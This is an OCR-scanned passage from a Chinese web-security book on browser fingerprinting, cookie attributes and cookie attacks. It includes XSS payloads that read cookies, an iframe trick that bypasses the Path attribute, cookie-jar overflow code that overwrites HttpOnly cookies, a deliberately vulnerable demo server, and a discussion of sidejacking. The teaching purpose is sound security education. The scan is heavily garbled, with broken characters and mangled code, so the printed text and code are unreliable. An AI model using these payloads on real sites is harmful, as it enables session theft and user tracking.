虽然 在 图 6-10 中 User-Agent 字 符 串 被 改 成 了 下， 但 window .navigator 中 既 有 被 修改 的 值 ， 
也 有 真正 的 值 ,在 appName 字 段 中 ,保存 的 是 被 修改 的 值 , 而 在 window.navigator.userAgent 
字段 中 ， 则 保存 着 真正 的 User-Agent 名 称 。 使 用 类 似 这 样 的 信息 ， 可 以 发 现 真 正 的 浏览 器 版 本 ， 
以 及 语言 和 平台 等 其 他 重要 信息 。 

要 知道 有 多 少 人 会 伪造 User-Agent 首 部 ， 可 以 看 看 有 多 少 Chrome 用 户 安装 了 User-Agent 
Switcher for Chrome 扩 展 ?. 在 写作 本 书 时 ,这 个 扩展 已 经 被 下 载 安装 了 超过 50 万 次 。 同 样 , 在 Firefox 
上 安装 User Agent Switcher 扩 展 的 数量 也 差不多 "。 
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6.1.3 dT ft bug 


浏览 器 bug 通 常 是 采集 浏览 器 指纹 的 可 靠 方式 。 注 意 , 我 们 这 里 所 说 的 bug， 并 不 是 通常 意义 
的 bug， 即 并 非 指 会 导致 安全 问题 的 意外 的 功能 。 在 这 里 , 我们 说 的 bug 不 一 定 涉及 安全 , 但 同样 
是 一 个 意外 的 功能 。 

这 种 bug 可 能 存在 于 某 个 浏览 器 的 某 个 特定 版 本 ， 然 后 在 后 续 某 个 版 本 中 被 修复 。 触 发 这 些 
bug 并 辅 以 它们 相应 的 修复 版 本 信息 ， 就 可 以 可 靠 地 确定 浏览 器 提供 商 和 版 本 (边界 )。 

比如 ， 这 里 有 一 个 bug: https://bugs.webkit.org/show_bug.cgi?id=96694。 它 会 导致 执行 以 下 代 
人 码 时 返回 false: 


function testVuln() { 

return !!document.implementation.createHTMLDocument (undefined) 
.querySelector("title").textContent ; 

j 





















































alert (testVuln() ) 

可 是 ， 如 果 结 果 返 回 true， 我 们 就 知道 这 个 bug 已 经 被 修复 了 。 了 人 解 这 个 信息 ， 就 可 以 知道 
目标 浏览 器 是 否 基于 WebKit， 以 及 相应 的 bug 是 否 已 经 被 修复 。 如 果 是 ， 那 么 该 浏览 器 不 会 早 于 
2012 年 10 月 发 布 。 为 此 ， 可 以 在 Safari5 ( 结果 为 false ) 和 Safari 6.0.2 ( 结果 应 该 为 true ) 中 进 
行 验 证 。 这 样 可 以 缩小 浏览 器 版 本 的 范围 。 

因为 伪造 bug 虽 然 不 是 不 可 能 ， 但 是 会 非常 困难 ， 所 以 这 可 以 算是 一 种 采集 浏览 器 指纹 的 可 
靠 方法 。 对 我 们 来 说 ， 最 难 的 是 确定 哪些 bug 可 用 ， 毕 竟 这 个 过 程 并 不 直观 。 


6.1.4 基于 浏览 器 特有 行为 


浏览 器 特有 行为 ( quirk ) 与 bug 类 似 ， 因 为 它们 都 与 特定 浏览 器 或 浏览 器 的 特定 版 本 相关 。 
所 谓 特有 行为 , 可 能 是 某 浏览 器 支持 某 些 特殊 元 素 , 或 者 在 某 种 情况 下 JavaScript 的 某 个 函数 会 返 
回 特殊 的 值 。Erwan Abgrall 等 人 发 表 过 一 篇 论文 "， 主 要 研究 浏览 器 特有 行为 ， 展 示 了 通过 特有 
的 XSS 浏 览 旨 行 为 ， 可 以 识别 浏览 器 的 类 型 ， 甚 至 浏览 絮 的 特定 版 本 号 。 

浏览 器 特有 行为 是 不 同 浏览 器 及 平台 的 最 重要 的 信息 源 。 不同 浏览 器 为 添加 新 特性 都 在 你 追 
我 赶 。 而 为 了 眼前 利益 ， 有 了 时候 某 些 浏览 带 就 会 与 标准 一 致 。 结 果 就 是 不 同 浏览 带 中 会 出 现 不 同 
的 变量 名 、 参 数 ， 或 者 相同 特性 的 其 他 表现 形式 。 

比如 ,关于 可 见 性 的 特性 ， 在 最 近 的 浏览 器 实现 中 就 存在 一 些微 妙 的 不 同 。DOM 中 有 一 个 
变量 用 于 标识 页 面 是 否 可 见 。 此 外 ，Firefox 和 下 还 分 别 追 加 了 自己 的 变量 : mozHidden $i 
msHiaddqen。 通 过 检测 这 些 变量 ， 可 以 区 分 Firefox 和 IE: 
































































































































Var browser="Unknown"; 
var version = ""; 
if ( !document.hidden) { 
if(!!document.mozHidden == document .mozHidden) { 
browser="Firefox"; 
yelse if (!!document.msHidden == document .msHidden) { 
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browser="IE"; 
j 
} 


if (browser == "Firefox") 
{ 
if(!!('content' in document.createElement ('template'))) { 
version = ">=22"; 
Jelse{ 
version = "<= 21"; 
j 
}else if (browser == "IE") 
{ 
version = ">=10"; 
} 
alert (browser + ":" + version); 


在 这 个 例子 中 ， 第 一 个 测试 根据 niaqen 变 量 检测 ,设置 browser 变 量 。 然 后 ,在 确定 了 平 
台 之 后 ， 再 根据 Firefox 中 的 template HTML 元 素 进一步 检测 。 这 个 属性 是 在 Firefox 22 中 引入 
的 ， 因 此 存在 这 个 元 素 可 以 确定 版 本 至 少 是 22。 此 外 ， 如 果 没 有 template 元 素 , 可 以 知道 版 本 
时 所 225 

可 见 性 特性 是 在 IE10 中 加 入 的 ， 因 此 可 以 确定 被 检测 的 浏览 需 至 少 是 IE10。 在 写作 本 书 时 ， 
IE11 并 未 发 布 ,， 但 这 里 确实 可 以 添加 对 IE11 的 检测 ， 或 者 找到 一 个 只 有 IE8 或 IE9 支 持 的 特性 加 入 
测试 。 

类 似 http://caniuse.com 和 http://html5test.com 这 样 的 网 站 都 是 很 好 的 资源 。 通 过 比较 浏览 器 版 
本 和 平台 ， 可 以 实现 不 同 的 组 合 检测 。 



































6.2 £34 cookie 检测 


正如 其 名 字 所 暗示 的 ，cookie (英文 原意 为 “小 甜 饼 ”) 也 让 Web 体 验 变 得 更 美妙 。 对 Web 开 
发 者 而 言 ，cookie 能 给 他 们 带 来 很 多 便利 。 但 在 给 开发 者 带 来 便利 的 同时 ，cookie 也 给 攻击 者 带 
来 了 便利 。 本 节 将 深入 探讨 cookie， 了 解 为 什么 cookie 那 么 有 用 、 它 们 的 原理 以 及 它们 在 Web 中 扮 
演 的 角色 。 另 外 ,我们 还 会 介绍 如 何在 复杂 的 浏览 器 攻击 中 利用 cookie。 

cookie 是 在 浏览 器 中 存储 数据 的 一 种 简单 的 机 制 。cookie 存 储 的 数据 有 时 候 非常 重要 。 因 为 
cookie 有 很 多 用 途 ， 既 可 以 存储 会 话 标识 符 一 一 这 样 当 你 访问 网 站 时 ， 网 站 会 记 住 你 是 谁 ; 也 可 
以 存储 会 话 信 息 ， 记 住 你 刚才 做 过 什么 事 。cookie 还 包含 一 个 时 间 范 围 属 性 ， 表 示 它 的 有 效 期 ， 
可 能 是 几 秒 ， 也 可 能 是 未 来 很 长 时 间 。 

cookie 可 以 在 浏览 器 关闭 再 打开 后 仍然 有 效 ， 也 可 以 随 着 浏览 器 窗口 关闭 而 被 立即 删除 。 
cookie 由 Web 应 用 负责 维护 ,保存 在 浏览 器 的 本 地 数据 库 里 ， 相 应 的 数据 由 Web 应 用 设置 和 管理 。 

Web 应 用 请 求 浏览 器 为 它 在 一 段 时 间 内 保存 一 点 数据 。 当 浏览 器 重新 打开 相应 cookie 对 应 的 
域 时 , 就 会 在 每 一 个 HTTP 请 求 中 附加 该 cookie 一 起 发 送 。 这样, 浏览 器 就 可 以 识别 访问 网 站 的 特 
定 用 户 ， 从 而 实现 定向 广告 ， 以 及 在 用 户 重 新 访问 同一 网 站 时 显示 欢迎 消息 。 
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6.2.1 理解 结构 


cookie 数 据 会 在 浏览 器 与 Web 应 用 之 间 双 向 传输 。 为 了 在 浏览 需 中 设置 cookie, 应 用 需要 发 送 


一 个 Set-Cookie 的 响应 首部 ， 其 中 包含 cookie 的 内 容 : 
口 cookie 的 名 称 

口 cookie 的 值 

口 cookie 的 失效 日 期 

O cookie 适 用 的 路 径 

O cookie 适 用 的 域 
口 其 他 cookie 相 关 属 
本 节 就 来 介 





性 

















绍 Set-Cookie 请 求 的 这 些 属性 ， 以 便 理解 后 续 要 介 





绍 的 cookie 攻 击 方 法 。 


为 此 ,我 们 先 写 一 段 Ruby 程 序 ， 用 来 设置 两 个 cookie， 然 后 将 它们 的 值 打印 到 屏幕 上 。 以 下 
一 个 失效 时 间 为 7 小 时 的 持久 化 cookie。 


代码 设置 两 个 cookie: 一 个 未 设置 失效 日 期 的 会 话 cookie， 
代码 还 为 每 个 cookie 设 置 了 HttpOnly 标 签 ， 而 且 该 cookie 适 


require 
require 








'rubygems' 
'thin' 
'rack' 
'sinatra' 
'json' 


require 
require 
require 


class CookieDemo « Sinatra::Base 
get "/" do 
response.set cookie "session cookie", 
:domain -» 'browserhacker.com', 
:path Pup do c :httponly -» truej 
response.set cookie "persistent cookie", 
:domain -» 'browserhacker.com', 
:path '/' , :httponly => true , 
:expires => Time.now + (60 * 60 * 7) } 
"\n" + request.cookies.to json + "\n\n" 
end 
end 


=> 





=> 





@routes = ( 
"/" => CookieDemo.new 


} 


@rack_app = Rack::URLMap.new(@routes) 
Gthin = Thin: :Server.new("browserhacker.com", 


Thin: 
Thin: 


true 
false 


:Logging.silent = 
:Logging.debug = 


puts "[#{Time.now}] 
Gthin.start 


可 以 通过 cur1 来 查看 发 送 的 cookie， 比 如 : 


Thin ready" 




















4000, 


EHT 


{:value => 


{:value 


=> 


个 browserhacker.com 域 。 


'yes', 


'yes', 


Grack app) 
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curl -c cookiejar -b cookiejar -v http://browserhacker.com 


执行 以 上 代码 后 ， ae 中 ， 以 备 将 来 的 请 求 使 用 。 图 6-11 展 示 了 
多 次 发 送 相 同 的 请 求 的 结 


正如 这 里 演示 的 , cookie 作 为 请 求 的 一 部 分 发 送 了 , 格式 为 cookiename=value, 以 分 号 (;) 6 
分 隔 。 应 用 在 发 送 cookie 时 ,每 个 Set-Cookie 都 会 独占 一 行 。 除了 Expires 属 性 外 ，seesion cookie 








~$ curl -c cookiejar -b cookiejar -v http://browserhacker .com 

* About to connect() to browserhacker.com port 80 (36) 

* Trying 127.0.0.1... connected 

* Connected to browserhacker.com (127.0.8.1) port 88 (#0) 

> GET / HTTP/1.1 

> User-Agent: curl/7.21.4 (universal-apple-darwinii.8) libcurl/7.21.4 üpenSSL/8.9.8y zlib/1.2.5 
> Host: browserhacker.com 

> Accept: */* 

> Cookie: persistent_cookie=yes; session cookie-yes 


- 
< HTTP/1.1 288 OK 

< Content-Type: text/html;charset-utf-8 

* Replaced cookie session cookies"yes" for domain browserhacker.com, path /, expire 8 

< Set-Cookie: session cookie-zyes; domain-browserhacker.com; path=/; HttpOnly 

* Replaced cookie persistent cookie-"yes" for domain browserhacker.com, path /, expire 1385922765 

< Set-Cookie: persistent cookie-yes; domain-browserhacker.com; path=/; expires=Sun, 81 Dec 2013 18:32:45 -6888; H 
ttpünly 

« Content-Length: 53 

< X-XSS-Protection: 1; mode=block 

< X-Content-Type-Options: nosniff 

< X-Frame-Options: SAMEORIGIN 

< Connection: keep-alive 

< Server: thin 1.5.1 codename Straight Razor 

< 


("persistent cookie" :"yes" ,"session_cookie":"yes"} 


* Connection #8 to host browserhacker.com left intact 
* Closing connection #8 
r1.9.3-p484 





图 6-11 设置 并 发 送 cookie 

















和 persistent_cookie 几 乎 完全 相同 ， 区 别 仅 在 于 前 者 没有 设置 失效 时 间 ， 后 者 的 失效 时 间 为 7 小 


时 后 。 


6.2.2 理解 属性 


cookies T 














用 于 帮助 决定 什么 时 候 应 该 把 cookie 发 送 回 服务 器 ， 以 及 cookie 应 该 存活 多 长 时 








间 。 这 种 属性 的 组 合用 于 限制 用 户 对 攻击 者 的 暴露 程度 , 同时 也 确保 数据 不 会 保存 得 比 需要 的 时 
间 还 长 。 正 如 对 开发 者 来 说 ,理解 这 些 属性 对 用 户 与 应 用 交互 的 影响 非常 重要 ,理解 它们 的 功能 
对 我 们 来 说 也 同样 重要 。 

1. 理解 失效 时 间 属 性 

失效 时 间 对 应 的 属性 是 Expires， 它 帮助 浏览 器 决定 保存 cookie 的 时 间 。cookie 的 生命 周期 
可 以 长 至 浏览 器 多 次 重启 都 有 效 , 也 可 以 短 至 只 要 浏览 右 一 关闭 就 结束 。 不 设置 Expires 属 性 就 
可 以 实现 不 在 磁盘 上 保存 cookie， 而 一 旦 浏览 器 关闭 就 销毁 cookie 数 据 。 这 种 方法 常用 于 登录 会 
话 ， 以 及 其 他 不 需要 在 多 次 浏览 器 重启 过 程 中 仍然 保持 的 会 话 。 

对 追踪 用 户 而 言 ， 会 话 cookie 是 理想 的 选择 。 如 果 应 用 想 在 用 户 每 次 返回 应 用 时 都 区 分 识别 
他 们 ,那么 持久 cookie 更 合适 。 持 久 cookie 会 设置 一 下 未 来 的 删除 cookie 的 时 间 。 设置 时 间 可 长 可 
短 ， 从 几 秒 钟 到 比 用 户 存续 时 间 还 长 都 可 以 。 
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了 解 了 cookie 的 类 型 ， 才 能 更 好 地 攻击 用 户 会 话 。 在 窃取 会 话 的 时 候 ，cookie 的 存活 时 间 和 
会 话 的 超时 值 (timeout value ) 决定 了 你 有 多 长 时 间 可 以 维持 访问 。 过 短 的 会 话 超时 时 间 会 限制 
cookie 的 可 用 性 ,即使 cookie 的 生命 周期 很 长 也 没有 用 。 在 攻击 Web 浏 览 絮 的 过 程 中 , 理解 这 些 细 
微 的 差别 非常 重要 。 

2. 理解 HttpOnly 标 签 

HttpOnly 标 签 用 于 阻止 JavaScript 及 其 他 脚本 语言 访问 cookie。 HttpOnly 告 诉 浏览 器 只 能 通过 
HTTP 协 议 传 输 cookie， 不 能 在 DOM 中 访问 cookie。 这 样 可 以 防止 XSS 攻 击 向 外 部 发 送 cookie 数 
据 , 也 可 以 防止 泻 染 HTML 代 码 时 修改 cookie。 下 面 我 们 就 扩展 前 面 的 代码 片段 ， 进 一 步 认识 这 
个 标签 。 

原来 的 Ruby 代 码 设置 了 两 个 带 HttpOnly 标 签 的 会 话 cookie， 可 以 通过 在 DOM 中 访问 cookie 来 
验证 这 一 点 。 打 开 Firebug 控 制 台 ， 在 命令 编辑 器 中 输入 document .cookie， 然 后 单 击 Run。 结 
果 就 返回 一 个 空 值 ， 如 图 6-12 所 示 。 





wt Wd 2 E | Console ~ HTML CSS Script DOM Net Cookies 


là Clear Persist Profile All Errors Warnings Info Debug info Cookies 





>>> document. cookie 





Al6-12 ”通过 控制 台 查 看 cookie 


如 果 想 实现 在 DOM 中 访问 cookie， 则 必须 禁用 HttpOnly 标 签 。 为 此 ,修改 setcookie 函 数 的 
最 后 一 个 参数 ， 不 让 它 启 用 HttpOnly 标 签 。 修 改 后 的 代码 如 下 : 


class CookieDemo < Sinatra::Base 
get "/" do 
response.set_cookie "session_cookie", {:value => 'yes', 
:domain => 'browserhacker.com', 
:path => '/' >} 
response.set_cookie "persistent_cookie", {:value => 'yes', 
:domain => 'browserhacker.com', 
:path => '/', :expires => Time.now + (60 * 60 * 7) } 
"\n" + request.cookies.to json + "\n\n" 
end 
end 


重新 加 载 页 面 ， 再 次 在 Firebug 控 制 台 中 执行 aocument . cookie ， 就 会 看 到 响应 中 包含 的 
cookie 了 ， 如 图 6-13 所 示 。 

















€ Ww: *|[Console- | HTML css Script Net Cookies 


là Clear  Persist Profile All Errors Warnings Info Debug info Cookies 





»»» document.cookie 


"session cookie-yes; persistent, cookie-yes" 




















Al6-13 ”通过 控制 台 查 看 未 设置 HttpOnly 标 签 的 cookie 
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这 里 演示 了 在 你 能 够 随意 通过 浏览 器 执行 JavaScript 代 码 的 情况 下 ， 如 何 访问 未 设置 HttpOnly 
标签 的 cookie。 不 过 ， 在 不 读 取 HttpOnly cookie 的 情况 下 ， 还 是 可 以 利用 它们 的 。 具 体 细节 请 看 
第 9 章 的 详细 介绍 。 

3. 理解 安全 标签 

假设 有 一 个 电子 商务 应 用 托管 在 browserhacker.com 上， 这 个 应 用 需要 跟踪 购物 车 ， 并 在 用 户 
访问 结账 页 面 时 对 用 户 进行 认证 。 此 时 ， 如 果 能 够 通过 HTTPS 来 实现 结账 功能 就 更 好 了 。 

Secure 这 个 安全 标签 就 是 用 于 限制 只 能 通过 SSL 加 密 的 连接 发 送 cookie。 设 置 这 个 标签 不 仅 能 
防止 不 适当 地 使 用 cookie， 也 可 以 阻止 别有用心 的 人 窥探 cookie。 

4. 理解 路 径 属 性 

路 径 (Path) 属性 加 上 域 (Domain) 标签 ， 用 于 表示 cookie 适 用 的 范围 。 大 型 的 应 用 通常 
需要 宽泛 的 域 或 路 径 ， 以 便 用 户 能 够 在 站 点 的 多 个 子 域 之 间 跳 转 。 

下 面 还 以 我 们 的 电子 商务 应 用 browserhacker.com 为 例 。 理 想 的 情况 是 使 用 两 个 cookie: 一 个 
会 话 cookie 跟 踪 用 户 对 所 有 browserhacker.com 域 的 访问 ， 男 一 个 会 话 cookie 跟 踪 在 browserhacker. 
com 中 认证 后 的 用 户 ， 将 其 限制 于 只 能 访问 /checkout 路 径 。 通 过 将 cookie 限 制 到 特定 的 路 径 ， 再 
加 上 使 用 HttpOnly 等 安全 功能 ， 暴 露 结账 环 节 私密 信息 的 可 能 性 就 会 大 大 降低 。 

可 惜 现实 并 没有 那么 美好 。 只 要 最 顶级 内 容 存在 XSS 利 用 漏洞 ， 那 么 就 没 办 法 阻止 通过 打开 
内 骸 的 框架 向 限定 的 路 径 注入 JavaScript， 然 后 访问 相应 的 cookie。 即 使 子 内 山 框 架 处 于 SOP 保 护 
之 下 ，cookie 依 旧 会 曝光 。 下 一 小 节 我 们 就 看 看 怎么 实现 。 


6.2.3” 绕 过 路 径 属 性 的 限制 


基于 前 面 Ruby 代 码 的 例子 ， 我 们 再 构建 一 个 新 应 用 ， 暴 露 两 个 路 径 ， 并 分 别 设置 自 己 的 
cookie 。 根 路 径 设 置 一 个 叫 parent cookie 的 通用 cookie ， 而 /checkout 路 径 设 置 更 敏感 的 叫 
checkout cookie 的 cookie。 以 下 代码 在 根 路 径 上 存在 XSS 漏 洞 ， 即 没有 恰当 处 理 fest 人 参数 : 

require 'rubygems' 

require 'thin' 

require 'rack' 












































































































































require 'sinatra' 
require 'json' 


class CookieDemo « Sinatra::Base 
get "/" do 
response.set cookie "parent cookie", {:value => 'yes', 
:domain -» 'browserhacker.com', 
:path => '/' ) 


"Test parameter: " + params['test'] 
end 


get "/checkout" do 
response.set cookie "checkout cookie", 
(:value -» 'RESTRAINED TO THIS PATH', 
:domain -» 'browserhacker.com', 
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:path => '/checkout' } 
end 


end 


@routes = { 
"/" => CookieDemo.new 


} 


@rack_app = Rack::URLMap.new(@routes) 
@thin = Thin::Server.new("browserhacker.com", 4000, @rack_app) 


Thin: :Logging.silent = true 
Thin: :Logging.debug = false 


puts "[#{Time.now}] Thin ready" 
Gthin.start 


假设 /checkout 路 径 没 有 任何 XSS 漏 洞 ， 因 此 无 法 通过 这 个 路 径 盗 取 checkout _ cookie。 然而 ， 
根 路 径 存在 一 个 XSS 漏 洞 。 在 后 面 的 例子 中 ， 我 们 使 用 alert O 函数 来 展示 窃取 到 的 cookie。 当 
然 在 实际 的 攻击 中 ， 我们 要 使 用 其 他 方法 把 穷 取 到 的 cookie 输 送 到 自己 控制 的 位 置 。 执 行 以 下 代 
人 码 会 拿 到 parent_cookie: 

/?test=hi<script>alert (document.cookie)$3b«/script» 


输出 结果 如 图 6-14 所 示 。 


eoo Mozilla Firefox 
[e] c Lt] 


'onnecting... 


(4) @ browserhacker.com:4000/?test=hi<script>aler 5 7 





Al6-14 SBA ETE F cookie 


3XigjlUcheckoutjtft Fiicookie, 需要 一 个 指向 该 位 置 的 内 骸 框 架 。 以 下 JavaScript 代 码 会 创 
建 相应 的 内 髓 框架 并 窃取 该 cookie: 


iframe-document.createElement('iframe'); 
iframe.src-'http://browserhacker.com:4000/checkout'; 
iframe.onload=function() { 

alert (iframe.contentWindow.document.cookie) ; 
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i 
document .body.appendChild(iframe) ; 


将 这 些 代 码 打包 在 一 起 ， 就 变 成 了 如 下 形式 ， 这 些 代码 会 在 IFrame 完 全 加 载 后 执行 : 


/?test=hi<script>iframe=document.createElement ('iframe')%3b 
iframe.src='http://browserhacker.com:4000/checkout '%3biframe 
.onload=function() {alert (iframe.contentWindow. document .cookie 
)}%3bdocument .body.appendChild(iframe) </script> 


执行 这 段 JavaScript 的 结果 如 图 6-15 所 示 。 


Mozilla Firefox 


checkout_cookie=RESTRAINED+TO+THIS+PATH; parent_cookie=yes 





on 





图 6-15 EBA ER PII Hill cookie 


这 个 例子 展示 了 用 于 保护 cookie 的 Path 属 性 的 不 足 之 处 ， 特 别 是 在 XSS 或 其 他 Web 应 用 缺陷 
存在 的 情况 下 ， 这 种 不 足 就 更 危险 了 。 在 这 个 例子 里 ， 使 用 HttpOnly 标 签 可 以 阻止 直接 穷 取 
/checkout 路 径 下 的 cookie。 然 而 ， 正 像 9.8 节 将 会 介绍 的 ， 只 要 存在 XSS 缺 陷 ， 就 无 法 阻止 将 访问 
代理 到 受害 者 的 浏览 禹 ， 进 而 窃取 其 cookie。 





6.2.4 cookie 存储 区 溢出 


大 多 数 网 站 都 默认 在 设置 了 cookie 后 ， 还 会 以 相同 的 状态 取得 它 。 网 站 设置 cookie 后 cookie 
会 被 保存 在 存储 区 〈 也 就 是 浏览 器 用 于 保存 站 点 信息 的 本 地 数据 库 )。 但 这 个 存储 区 能 够 保存 的 
cookie 数 量 有 限 。 虽 然 由 于 HttpOnly 或 者 其 他 原因 不 能 直接 修改 cookie, 但 我 们 可 以 影响 发 送 回 浏 
览 器 的 内 容 。 

在 可 以 在 浏览 器 中 创建 cookie 的 情况 下 ，Alex Kouzemtchenko'*#llChris Evans? ( 以 及 最 近 的 
John Wilander" ) 演示 了 如 何 让 cookie 存 储 区 溢出 ， 从 而 删除 老 cookie。 如 果 之 后 再 将 已 有 cookie 
替换 成 你 的 cookie， 就 可 以 控制 用 户 与 网 站 的 交互 。 下 面 就 来 看 一 个 例子 : 

require 'rubygems' 


require 'thin' 
require 'rack' 








require 'sinatra' 
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require 'json' 


class CookieDemo < Sinatra::Base 


get "/" do 
link_url = "http://www.google.com" 
if !request.cookies['link url'] then 
response.set cookie "link url", {:value => link url, 
:httponly => true) 
else 
link url = request.cookies['link url'] 
end 
'<A HREF-"' + link url + '">Secret Login Page</A> 
<script> 


function setCookie() 
{ 
document.cookie = "link_url=http://blog.browserhacker.com"; 
alert ("Single cookie sent"); 
j 
function setCookies() 
( 
yar loce; 
while (i « 200) 
{ 


kname = "test_COOKIE" + i; 
document.cookie = kname + "=test"; 
qm 7a. dee hs 
} 
document.cookie = "link_url=http://browserhacker.com"; 


alert ("Overflow Executed"); 


j 

«/script» 

«BR» 

«input type=button value-"Attempt Change" onclick-"setCookie()"»«BR» 
«input type=button value-"Spam Cookies" onclick="setCookies () "> 


end 


@routes = ( 
"/" => CookieDemo.new 


} 


Grack app = Rack: :URLMap.new(@routes) 
@thin = Thin::Server.new("browserhacker.com", 4000, @rack_app) 


Thin: :Logging.silent = true 


Thin: :Logging.debug = false 


puts "[#{Time.now}] Thin ready" 
Gthin.start 


在 这 个 例子 中 , 浏览 器 加 载 页 面 时 会 设置 link_url cookie。 当 用 户 返 回 该 页 面 时 , 浏览 器 会 取 
得 该 cookie， 将 URL 作 为 Secret Login Page 链 接 的 HREF 值 发 回 。 虽 然 这 个 例子 是 人 为 设计 的 ,但 
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这 种 用 法 却 很 广泛 。 网 站 可 以 根据 用 户 想 看 什么 ， 决 定 发 送 什么 URL，URL 就 存在 cookie 里 面 。 

加 载 页 面 后 会 看 到 两 个 按钮 : 一 个 Attempt Change 按 钮 和 一 个 Spam Cookies 按 钮 。 为 了 演示 
让 cookie 存 储 区 溢出 ,加 载 页 面 然 后 点 击 刷 新 。 你 会 看 到 链接 的 URL 是 http://www.google.com， 如 
图 6-16 所 示 。 重 新 加 载 ， 结 果 仍 然 一 样 。 


| @ browserhacker.com:4000 


Secret Login P: 
| Attempt Change i 
| Spam Cookies | 


www.google.com 


图 6-16” 带 默认 链接 的 示例 程序 








点 击 Attempt Change， 浏 览 器 会 尝试 用 指向 http:/blog.browserhacker.com 的 新 cookie， 来 重 写 
这 个 HttpOnly cookie。 再 次 点 击 刷新 ， 链 接 并 没 变 ， 如 图 6-17 所 示 。 这 是 因为 不 能 通过 JavaScript 
来 重 写 HttpOnly cookie。 








browserhacker.com:4000 YT 图 - Google Q 





Single cookie sent 


OK 





图 6-17 显示 了 警告 框 ,但 链接 并 没有 变 


但 是 ， 如 图 6-18 所 示 ， 点 击 了 Spam Cookies 按 钮 然后 再 刷新 页 面 ， 会 发 现 链接 指向 了 
http://browserhacker.com。 为 什么 这 次 可 以 了 ?因为 我 们 以 测试 cookie 导 致 了 cookie 存 储 区 溢出 ， 
并 再 次 通过 JavaScript 设 置 了 link_url cookie。 这 样 它 就 成 为 最 后 一 个 cookie， 也 就 是 在 页 面 刷新 时 
Ruby 拿 到 的 。 





Na) @ browserhacker.com:4000 


Secret Login Pagg. 


| Attempt Change | 
| Spam Cookies | 


browserhacker.com 


图 6-18 ” ”cookie 存储 区 溢出 后 的 链接 
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这 个 例子 演示 了 怎么 基于 一 个 不 安全 的 应 用 ， 以 cookie 为 目标 ， 通 过 JavaScript 来 控制 浏览 
与 网 页 和 目标 的 交互 。 这 个 例子 在 Firefox 中 是 可 以 运行 的 , 但 随 着 浏览 絮 不 断 更 新 ， 还 应 该 通过 
试验 来 确定 到 底 多 少 cookie 可 以 导致 存储 区 溢出 。 














6.2.5 “使 用 cookie 实现 跟踪 


第 3 章 讨 论 过 , 攻击 浏览 器 的 挑战 之 一 是 维持 对 目标 的 控制 。 特 别 是 在 执行 较 长 时 间 的 攻击 ， 
或 者 第 一 次 可 能 不 奏效 的 情况 下 ,维护 对 目标 的 控制 就 更 加 重要 了 。 当 浏览 器 前 省 ,用户 重 新 打 
开 攻 击 网 站 的 时 候 ， 需 要 确保 还 能 够 从 上 次 结束 的 地 方 开 始 ， 而 不 是 从 头 再 来 。 为 此 ， 可 以 创建 
一 个 比 浏 览 器 会 话 时 间 更 长 的 cookie， 既 能 实现 上 述 两 个 目标 ， 还 能 实现 对 用 户 的 跟踪 。 在 
JavaScript 中 实现 它 很 简单 。 我 们 假设 想 在 浏览 器 崩 淡 甚 至 删除 全 部 会 话 cookie 的 情况 下 ,仍然 要 
保持 对 用 户 的 跟踪 。 可 以 将 创建 cookie 的 代码 蔡 换 成 如 下 所 示 的 代码 : 


var exp = new 
Date (new Date().getTime() + daysInMilliseconds(5)).toGMTString(); 
document.cookie-" link url-http://browserhacker.com;expires-" + exp; 


EE, ，cookie 就 会 为 这 个 窗口 持续 保存 $ 天 ,从 而 为 你 多 次 尝试 提供 了 足够 的 时 间 。 用 户 再 回 
来 时 ， 也 不 会 因为 浏览 器 骨 溃 而 发 现 会 话 cookie 消 失 。 

如 果 你 希望 持续 跟踪 用 户 较 长 一 段 时 间 ， 可 以 试 试 Evercookie* 项 目 。 为 了 简化 跟踪 ， 
Evercookie 让 目标 很 难 删除 cookie， 却 让 你 很 容易 识别 用 户 。 





















































6.2.6 Sidejacking 攻击 


Sidejacking 攻 击 ， 或 者 HTTP 会 话 劫持， 是 通过 盗 取 别人 的 会 话 模仿 别人 的 一 种 方法 。 盗 取 
会 话 攻击 的 原理 是 通过 复制 某 个 用 户 在 一 个 站 点 上 的 会 话 cookie， 可 以 伪装 成 一 个 合法 的 用 户 。 
把 会 话 cookie 复 制 到 你 的 浏览 器 之 后 ， 相 应 的 站 点 就 会 相信 你 是 目标 ， 允 许 你 像 原来 的 用 户 一 样 
访问 他 们 的 账号 。 虽然 会 话 模 念 攻击 已 经 出 现 了 很 长 时 间 , 但 直到 Firesheep' 发布 它 才 受到 重视 。 

Firesheep 是 Eric Butler 写 的 一 个 Firefox 插 件 ， 可 以 通过 开放 的 无 线 网 络 监听 会 话 ， 然 后 再 将 
监听 到 的 会 话 信 息 转 发 给 你 ,你 只 需 简 单 地 双击 你 希望 模仿 的 目标 的 图 标 ,就 可 以 将 它们 的 cookie 
复制 到 你 的 浏览 器 ,然后 以 目标 用 户 的 身份 访问 相应 网 站 。Firesheep 可 以 说 是 披 着 羊皮 的 狼 ! E 
之 所 以 可 以 屡屡 得 手 ， 主 要 原因 就 是 很 多 大 网 站 ,包括 Twitter 和 Facebook， 只 使 用 HTTPS 保 护 其 
登录 页 面 ， 其 他 地 址 则 使 用 HTTP。 这 意味 着 会 话 cookie 不 会 被 打上 Secure 标 签 ， 因 为 必须 同时 通 
过 HTTP 和 HTTPS 渠 道 提 交 它 们 。 

Firesheep 虽 然 很 有 名 ， 但 实现 会 话 支持 仍然 有 别 的 途径 ， 比 如 XSS 攻 击 、 社 会 工程 及 其 他 应 
用 攻击 方法 。 只 要 这 些 方法 得 到 cookie， 就 可 以 在 其 失效 前 用 来 模仿 用 户 ， 除 非 用 户 已 经 退出 登 
录 或 者 会 话 被 销毁 。 

针对 会 话 劫持 的 解决 方案 是 给 cookie 使 用 Secure 标 签 ， 同 时 只 通过 SSL 发 送 会 话 信息 。 要 解 
决 这 个 问题 并 不 简单 , Facebook, 、Google 等 网 站 为 避免 此 类 攻击 , 已 经 慢 慢 迁 移 到 了 SSL。 不 过 ， 
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即便 如 此 ， 还 是 有 可 能 利用 ARP 坎 骗 或 其 他 MitM 技 术 来 截获 SSL 通 信 、 降 级 通信 ， 然 后 查看 
cookie。 这 些 攻击 通常 依赖 用 户 点 击 警告 框 。 如 果真 的 点 了 警告 杠 ，cookie 就 到 你 的 手 里 了 。 














6.3” 绕 过 HTTPS 


很 多 人 都 知道 , 我 们 上 网 的 时 候 ， 如 果 看 到 浏览 器 地 址 栏 附 近 出 现 了 锁 的 图 标 , 那 就 意味 着 
这 个 站 点 是 安全 的 ， 对 吧 ? 不 对 ! 这 个 锁 并 不 能 说 明 网 站 安全 ， 其 真正 含义 是 说 数据 都 会 通过 
HTTPS 而 不 是 明文 HTTP 来 传输 。 

